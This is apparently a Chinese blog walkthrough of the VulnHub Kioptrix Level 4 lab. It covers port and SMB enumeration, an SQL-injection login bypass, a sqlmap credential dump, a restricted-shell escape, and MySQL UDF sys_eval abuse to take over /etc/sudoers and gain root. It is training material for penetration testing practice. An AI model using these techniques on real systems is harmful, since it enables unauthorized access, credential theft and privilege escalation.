总字符数: 13.97K

代码: 6.81K, 文本: 7.15K

预计阅读时间: 28 分钟

Overview| Name | Template |

| — | — |
| Release Date | 2024-03-01 |
| Write-up Author | kill3r |
| Machine Author | kill3r |
| Difficulty | Medium |
| User Flag | |
| Root Flag | |
| Link | https://www.vulnhub.com/entry/kioptrix-level-13-4,25 |

相关技能1. MySql UDF

  1. restricted Shell Bypass

薄弱点1. MySql UDF

  1. restricted Shell Bypass

Nmap扫描```bash

ports=$(nmap -p- –min-rate=1000 -T4 192.168.150.130 | grep -oE ‘(^[0-9][^/tcp]*)’ | tr ‘\n’ ‘,’)
nmap -p$ports -sV -sC -O 192.168.150.130 -oN nmap.txt

第一行代码使用nmap命令扫描本地主机的所有端口(从1到65535),–min-rate=1000参数表示每秒发送最少1000个包,-T4参数表示设置扫描速度为快速扫描模式。

grep -oE ‘(^[0-9][^/tcp]*)’用于提取输出结果中的端口号,tr ‘\n’ ‘,’用于将提取的端口号按逗号分隔并拼接成一个字符串。

第二行代码使用nmap命令再次扫描指定的端口,-p$ports参数表示扫描之前提取的端口列表,-sV参数表示进行服务版本检测,-sC参数表示在扫描过程中使用默认脚本进行常见漏洞探测,-O参数表示进行操作系统版本检测,-oN nmap.txt参数表示将扫描结果保存到名为nmap.txt的文件中。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
```bash
┌──(root㉿kill3r)-[/home/kill3r]
└─# ports=$(nmap -p- --min-rate=1000 -T4 192.168.150.130 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')
┌──(root㉿kill3r)-[/home/kill3r]
└─# nmap -p$ports -sV -sC -O 192.168.150.130 -oN nmap.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-26 14:04 CST
Nmap scan report for 192.168.150.130
Host is up (0.00048s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:09:FE:DB (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: Kioptrix4
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: Kioptrix4.localdomain
|_ System time: 2024-02-26T09:05:00-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: 10h30m00s, deviation: 3h32m07s, median: 8h00m00s
|_smb2-time: Protocol negotiation failed (SMB2)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds

枚举### SMB 枚举> Port: 139 389 445 636

  • enum4linux-ng 127.0.0.1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
$ enum4linux-ng <ip>
┌──(root㉿kali)-[/opt/vulnhub/0x04]
└─# enum4linux-ng 192.168.150.130 > smb.result
┌──(root㉿kali)-[/opt/vulnhub/0x04]
└─# more smb.result
==================================================
| OS Information via RPC for 192.168.150.130 |
==================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[+] Found OS information via 'srvinfo'
[+] After merging OS information we have the following result:
OS: Linux/Unix (Samba 3.0.28a)
OS version: '4.9'
OS release: not supported
OS build: not supported
Native OS: Unix
Native LAN manager: Samba 3.0.28a
Platform id: '500'
Server type: '0x809a03'
Server type string: Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
┌──(root㉿kali)-[/opt/vulnhub/0x04]
└─# cat smb.result | grep user
[+] Server allows session using username '', password ''
[*] Check for random user
[+] Server allows session using username 'gmbklnrd', password ''
[H] Rerunning enumeration with user 'gmbklnrd' might give more results
[*] Enumerating users via 'querydispinfo'
[+] Found 5 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 5 user(s) via 'enumdomusers'
[+] After merging user results we have 5 user(s) total:
username: root
username: loneferret
username: john
username: robert
username: nobody
  • MSF-SMB
1
2
3
4
5
6
# 基于SMB协议扫描版本号
msf6 > use auxiliary/scanner/smb/smb_version
# 扫描共享文件
msf6 > use auxiliary/scanner/smb/smb_enumshares
# 基于SMB进行用户信息枚举
msf6 > use auxiliary/scanner/smb/smb_lookupsid

Web> HTTP Web Server, Port Like: 80 443 81 8080 8443 4443 8081

  • Finger:获取有关特定用户或系统上的用户列表和配置信息

`whatweb````bash

用于识别和分析目标网站的技术栈、CMS(内容管理系统)、插件、框架和其他与网站相关的信息。通过分析网站的响应和页面内容

┌──(root㉿kill3r)-[~]
└─# whatweb 192.168.150.130
http://192.168.150.130 [200 OK] Apache[2.4.46], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.46 (Debian)], IP[192.168.150.130], Script[text/javascript]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
- 目录枚举
`dirb http://192.168.150.130`
`dirsearch -u http://192.168.150.130 -r`
`gobuster dir -w ... -u http://192.168.150.130 -x html,php,js,bak`
```bash
┌──(root㉿kill3r)-[~]
└─# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.150.130 -x html,php,js,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.150.130
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: bak,html,php,js
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 358] [--> http://192.168.150.130/images/]
/index.php (Status: 200) [Size: 1255]
/.html (Status: 403) [Size: 327]
/index (Status: 200) [Size: 1255]
/member (Status: 302) [Size: 220] [--> index.php]
/member.php (Status: 302) [Size: 220] [--> index.php]
/logout (Status: 302) [Size: 0] [--> index.php]
/logout.php (Status: 302) [Size: 0] [--> index.php]
/john (Status: 301) [Size: 356] [--> http://192.168.150.130/john/]
/robert (Status: 301) [Size: 358] [--> http://192.168.150.130/robert/]
/.html (Status: 403) [Size: 327]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================
  • 漏洞扫描
1
2
$ nikto -h http://www.example.com/
$ nuclei -u https://example.com/

wordlist- cewl.list:

cewl http://192.168.150.130/ -w dict.txt

1
2
3
4
5
```
- pass.list
```plaintext
MyNameIsJohn
ADGAdsafdfwt4gadfga==
  • user.list
1
2
3
4
5
root
loneferret
john
robert
nobody
  • hash.list
1
2
3
```
- information.list
```bash

复现过程### 访问靶场,寻找功能点发现登录功能,尝试万能密码1" or "1"="1/1' or '1'='1

发现报错,并且用户功能点的单引号被转义了,把用户名换成一个正常的试试,密码还是用万能密码
发现存在SQL注入,由于是POST请求,使用BURP抓包,用SQLMAP跑一跑
保存成文件

信息分析```bash

┌──(root㉿kali)-[/opt/vulnhub/0x04]
└─# sqlmap -r sql.txt –leve 3 –batch –dbs
available databases [3]:
[] information_schema
[] members
[*] mysql
┌──(root㉿kali)-[/opt/vulnhub/0x04]
└─# sqlmap -r sql.txt –leve 3 –batch -D members –tables
Database: members
[1 table]
+———+
| members |
+———+
┌──(root㉿kali)-[/opt/vulnhub/0x04]
└─# sqlmap -r sql.txt –leve 3 –batch -D members -T members –dump
Database: members
Table: members
[2 entries]
+—-+———————–+———-+
| id | password | username |
+—-+———————–+———-+
| 1 | MyNameIsJohn | john |
| 2 | ADGAdsafdfwt4gadfga== | robert |
+—-+———————–+———-+

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
使用已知的`user.list and pass.list`进行密码喷洒
Web界面没有功能点
### SSH```bash
┌──(root㉿kali)-[/opt/vulnhub/0x04]
└─# ssh -o HostKeyAlgorithms=ssh-rsa john@192.168.150.130
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$
┌──(root㉿kali)-[/opt/vulnhub/0x04]
└─# ssh -o HostKeyAlgorithms=ssh-rsa robert@192.168.150.130
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
robert:~$

提示:欢迎来到安全系统,很有可能是受限Shell

https://jiangjiyue.github.io/2024/07/28/ecc74cbe/
后渗透-Restricted Shell Bypass总字符数: 4.18K 代码: 0.50K, 文本: 1.54K预计阅读时间: 9 分钟 简介 受限制的Shell是出于安全考虑而创建的,主要用于限制用户对系统的访问权限和阻止/限制某些命令(如cd、Ls、Echo).它通常在特定环境中使用,比如共享服务器、网络环境或受限的用户帐户.受限制的Shell可以阻止带有斜杠或输出重定向符号(如>、>&
1
2
3
4
5
6
7
8
john:~$ python -c 'print("Hello, Python!")'
*** unknown command: python
john:~$ python3 -c 'print("Hello, Python!")'
*** unknown command: python3
john:~$ ruby -e 'puts "Hello, Ruby!"'
*** unknown command: ruby
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$
### 系统信息收集```bash john@Kioptrix4:/tmp$ history 1 exit 2 sudo su 3 clear 4 ls 5 cd /home/loneferret 6 ls 7 ./nc 8 rm nc 9 exit 10 id john@Kioptrix4:/tmp$ cat /home/john/.bash_history exit sudo su clear ls cd /home/loneferret ls ./nc rm nc exit john@Kioptrix4:/tmp$ uname -a Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux john@Kioptrix4:/tmp$ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 8.04.3 LTS Release: 8.04 Codename: hardy john@Kioptrix4:/tmp$ ┌──(root㉿kali)-[/opt/TOP10/burp] └─# searchsploit Ubuntu 8.04.3 --------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------- --------------------------------- Ubuntu < 15.10 - PT Chown Arbitrary PT | linux/local/41760.txt --------------------------------------- --------------------------------- Shellcodes: No Results --------------------------------------- --------------------------------- Paper Title | Path --------------------------------------- --------------------------------- Debian < 5.0.6 / Ubuntu < 10.04 - Webs | english/15311-debian--5.0.6--ubu --------------------------------------- --------------------------------- # 没有可用漏洞,换方向 john@Kioptrix4:/tmp$ sudo -l [sudo] password for john: Sorry, user john may not run sudo on Kioptrix4. john@Kioptrix4:/tmp$ find / -perm -u=s -type f 2>/dev/null /usr/lib/apache2/suexec /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/lib/pt_chown /usr/bin/chsh /usr/bin/sudo /usr/bin/traceroute6.iputils /usr/bin/newgrp /usr/bin/sudoedit /usr/bin/chfn /usr/bin/arping /usr/bin/gpasswd /usr/bin/mtr /usr/bin/passwd /usr/bin/at /usr/sbin/pppd /usr/sbin/uuidd /lib/dhcp3-client/call-dhclient-script /bin/mount /bin/ping6 /bin/fusermount /bin/su /bin/ping /bin/umount /sbin/umount.cifs /sbin/mount.cifs # 没有,下一位 john@Kioptrix4:/home$ cd /var/www/ john@Kioptrix4:/var/www$ cat checklogin.php 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
{% link https://jiangjiyue.github.io/2020/12/21/466824cf/ desc:true %}
### MySQL提权```sql
mysql> SELECT * FROM information_schema.tables WHERE table_name like '%fun%';
+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+--------------------+--------------+-----------+----------------+---------------------+---------------------+---------------------+-----------------+----------+----------------+------------------------+
| TABLE_CATALOG | TABLE_SCHEMA | TABLE_NAME | TABLE_TYPE | ENGINE | VERSION | ROW_FORMAT | TABLE_ROWS | AVG_ROW_LENGTH | DATA_LENGTH | MAX_DATA_LENGTH | INDEX_LENGTH | DATA_FREE | AUTO_INCREMENT | CREATE_TIME | UPDATE_TIME | CHECK_TIME | TABLE_COLLATION | CHECKSUM | CREATE_OPTIONS | TABLE_COMMENT |
+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+--------------------+--------------+-----------+----------------+---------------------+---------------------+---------------------+-----------------+----------+----------------+------------------------+
| NULL | mysql | func | BASE TABLE | MyISAM | 10 | Fixed | 3 | 579 | 1737 | 162974011515469823 | 2048 | 0 | NULL | 2012-02-04 10:00:35 | 2020-12-21 15:24:46 | 2020-12-21 10:35:01 | utf8_bin | NULL | | User defined functions |
+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+--------------------+--------------+-----------+----------------+---------------------+---------------------+---------------------+-----------------+----------+----------------+------------------------+
1 row in set (0.00 sec)
-- 上方有个func表,属于mysql数据库,查看他存在哪些函数
mysql> select * from mysql.func;
+-----------------------+-----+---------------------+----------+
| name | ret | dl | type |
+-----------------------+-----+---------------------+----------+
| lib_mysqludf_sys_info | 0 | lib_mysqludf_sys.so | function |
| sys_exec | 0 | lib_mysqludf_sys.so | function |
+-----------------------+-----+---------------------+----------+
2 rows in set (0.00 sec)

存在sys_exec函数但是无法利用,重新创建个函数试试

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
mysql> create function sys_eval returns string soname 'udf.so';
ERROR 1046 (3D000): No database selected
mysql> use mysql
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> create function sys_eval returns string soname 'lib_mysqludf_sys.so';
Query OK, 0 rows affected (0.00 sec)
mysql> select * from mysql.func;
+-----------------------+-----+---------------------+----------+
| name | ret | dl | type |
+-----------------------+-----+---------------------+----------+
| lib_mysqludf_sys_info | 0 | lib_mysqludf_sys.so | function |
| sys_exec | 0 | lib_mysqludf_sys.so | function |
| sys_eval | 0 | lib_mysqludf_sys.so | function |
+-----------------------+-----+---------------------+----------+
3 rows in set (0.00 sec)
mysql> select sys_eval('id');
+--------------------------+
| sys_eval('id') |
+--------------------------+
| uid=0(root) gid=0(root) |
+--------------------------+
1 row in set (0.00 sec)
-- 成功提权
mysql> select sys_eval('chown -R john:john /etc/sudoers');
+---------------------------------------------+
| sys_eval('chown -R john:john /etc/sudoers') |
+---------------------------------------------+
| |
+---------------------------------------------+
1 row in set (0.00 sec)
mysql> exit
Bye
john@Kioptrix4:/var/www$ ls -la /etc/ | grep sudoers
-r--r----- 1 john john 557 2012-02-04 09:58 sudoers
john@Kioptrix4:/var/www$ chmod +w /etc/sudoers
john@Kioptrix4:/var/www$ ls -la /etc/ | grep sudoers
-rw-r----- 1 john john 557 2012-02-04 09:58 sudoers
john@Kioptrix4:/var/www$ vi /etc/sudoers
1
2
3
4
5
6
7
8
9
10
11
12
13
14
john@Kioptrix4:/var/www$ sudo -l
sudo: /etc/sudoers is mode 0640, should be 0440
john@Kioptrix4:/var/www$ chmod 0440 /etc/sudoers
john@Kioptrix4:/var/www$ mysql -uroot -p
Enter password:
mysql> select sys_eval('chown -R root:root /etc/sudoers');
+---------------------------------------------+
| sys_eval('chown -R root:root /etc/sudoers') |
+---------------------------------------------+
| |
+---------------------------------------------+
1 row in set (0.00 sec)
mysql> exit
Bye
1
2
3
4
5
6
7
8
9
john@Kioptrix4:/var/www$ sudo -l
User john may run the following commands on this host:
(root) NOPASSWD: ALL
john@Kioptrix4:/var/www$ sudo su
root@Kioptrix4:/var/www# cd /root/
root@Kioptrix4:~# whoami
root
root@Kioptrix4:~# id
uid=0(root) gid=0(root) groups=0(root)
## Shell as user1 ## Shell as user2 ## 以root身份进入Shell> 保存屏幕截图作为Flag或Proof
许可协议

本文由 kill3r 原创,采用 署名-非商业性使用-相同方式共享 4.0 国际 许可协议,转载请注明出处。

分享文章

快来参与讨论吧~